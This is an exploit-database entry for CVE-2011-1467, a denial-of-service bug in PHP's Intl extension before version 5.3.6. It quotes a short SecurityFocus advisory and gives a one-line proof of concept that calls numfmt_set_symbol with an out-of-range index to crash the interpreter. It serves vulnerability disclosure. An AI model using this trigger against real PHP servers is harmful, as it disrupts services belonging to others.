PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Denial of Service
| EKU-ID: 40102 | CVE: CVE-2011-1467;OSVDB-73625 | OSVDB-ID: |
| Author: thoger | Published: 2011-03-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 40102 | CVE: CVE-2011-1467;OSVDB-73625 | OSVDB-ID: |
| Author: thoger | Published: 2011-03-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/46968/info
PHP is prone to a remote denial-of-service vulnerability that affects the 'Intl' extension.
Successful attacks will cause the application to crash, creating a denial-of-service condition. Due to the nature of this issue, arbitrary code-execution may be possible; however, this has not been confirmed.
PHP versions prior to 5.3.6 are vulnerable.
numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "")